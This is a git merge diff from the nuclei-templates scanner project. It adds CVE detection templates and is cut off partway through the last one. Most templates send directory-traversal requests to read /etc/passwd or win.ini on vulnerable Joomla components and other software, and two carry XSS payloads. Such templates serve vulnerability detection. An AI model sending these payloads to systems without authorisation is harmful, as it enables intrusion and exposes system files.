Merge branch 'master' into dynamic_attributes
commit
7b29be739e
|
@ -9,6 +9,7 @@ on:
|
|||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
|
||||
steps:
|
||||
- name: Checkout Repo
|
||||
uses: actions/checkout@master
|
||||
|
@ -24,7 +25,7 @@ jobs:
|
|||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go get -v github.com/projectdiscovery/templates-stats
|
||||
go get -v github.com/projectdiscovery/templates-stats@main
|
||||
shell: bash
|
||||
|
||||
- name: Markdown Stats
|
||||
|
|
|
@ -1,2 +1,5 @@
|
|||
.idea/
|
||||
.DS_Store
|
||||
local/
|
||||
.checksum
|
||||
.new-additions
|
|
@ -97,3 +97,4 @@ You can refer to the following articles of Git and GitHub basics. In case you ar
|
|||
- **Nuclei** outcomes are only as excellent as **template matchers💡**
|
||||
- Declare at least two matchers to reduce false positive
|
||||
- Avoid matching words reflected in the URL to reduce false positive
|
||||
- Avoid short word that could be encountered anywhere
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 |
|
||||
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 |
|
||||
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 |
|
||||
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 |
|
||||
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | |
|
||||
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | |
|
||||
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | |
|
||||
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | |
|
||||
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | |
|
||||
| config | 90 | gaurang | 42 | workflows | 34 | | | | |
|
||||
| cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 |
|
||||
| panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 |
|
||||
| xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 |
|
||||
| wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 |
|
||||
| exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | |
|
||||
| rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | |
|
||||
| lfi | 176 | gy741 | 68 | takeovers | 70 | | | | |
|
||||
| cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | |
|
||||
| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
|
||||
| tech | 101 | gaurang | 42 | workflows | 35 | | | | |
|
||||
|
||||
**138 directories, 1709 files**.
|
||||
**144 directories, 1870 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
1323
TEMPLATES-STATS.md
1323
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 |
|
||||
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 |
|
||||
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 |
|
||||
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 |
|
||||
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | |
|
||||
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | |
|
||||
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | |
|
||||
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | |
|
||||
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | |
|
||||
| config | 90 | gaurang | 42 | workflows | 34 | | | | |
|
||||
| cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 |
|
||||
| panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 |
|
||||
| xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 |
|
||||
| wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 |
|
||||
| exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | |
|
||||
| rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | |
|
||||
| lfi | 176 | gy741 | 68 | takeovers | 70 | | | | |
|
||||
| cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | |
|
||||
| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
|
||||
| tech | 101 | gaurang | 42 | workflows | 35 | | | | |
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2005-4385
|
||||
|
||||
info:
|
||||
name: Cofax <= 2.0RC3 XSS
|
||||
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
|
||||
reference:
|
||||
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cofax,xss,cve,cve2005
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'>\"</script><script>alert(document.domain)</script>"
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2006-1681
|
||||
|
||||
info:
|
||||
name: Cherokee HTTPD <=0.5 XSS
|
||||
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
|
||||
reference:
|
||||
- https://www.securityfocus.com/bid/17408
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cherokee,httpd,xss,cve,cve2006
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2008-4668
|
||||
|
||||
info:
|
||||
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/6618
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4668
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2008-4764
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/5435
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4764
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2008-6172
|
||||
|
||||
info:
|
||||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2008-6668
|
||||
|
||||
info:
|
||||
name: nweb2fax <= 0.2.7 Directory Traversal
|
||||
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5856
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: nweb2fax,lfi,cve,cve2008
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-5114
|
||||
|
||||
info:
|
||||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||
tags: cve,cve2009,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0943
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jashowcase - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11090
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0943
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0944
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jcollection - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11088
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0944
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1353
|
||||
|
||||
info:
|
||||
name: Joomla! Component LoginBox - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12068
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1353
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1474
|
||||
|
||||
info:
|
||||
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12182
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1474
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1495
|
||||
|
||||
info:
|
||||
name: Joomla! Component Matamko 1.01 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12286
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1495
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1602
|
||||
|
||||
info:
|
||||
name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12283
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1602
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1657
|
||||
|
||||
info:
|
||||
name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12428
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1657
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1722
|
||||
|
||||
info:
|
||||
name: Joomla! Component Online Market 2.x - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12177
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1722
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1875
|
||||
|
||||
info:
|
||||
name: Joomla! Component Property - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11851
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1875
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1953
|
||||
|
||||
info:
|
||||
name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12288
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1953
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1955
|
||||
|
||||
info:
|
||||
name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12238
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1955
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1979
|
||||
|
||||
info:
|
||||
name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12088
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1979
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1983
|
||||
|
||||
info:
|
||||
name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12055
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1983
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2033
|
||||
|
||||
info:
|
||||
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2033
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2259
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_bfsurvey - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/10946
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2259
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2682
|
||||
|
||||
info:
|
||||
name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/14017
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2682
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4617
|
||||
|
||||
info:
|
||||
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/15791
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4617
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2010-5278
|
||||
|
||||
info:
|
||||
name: MODx manager - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/34788
|
||||
- https://www.cvedetails.com/cve/CVE-2010-5278
|
||||
tags: cve,cve2010,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
part: body
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2011-4336
|
||||
|
||||
info:
|
||||
name: Tiki Wiki CMS Groupware 7.0 has XSS
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
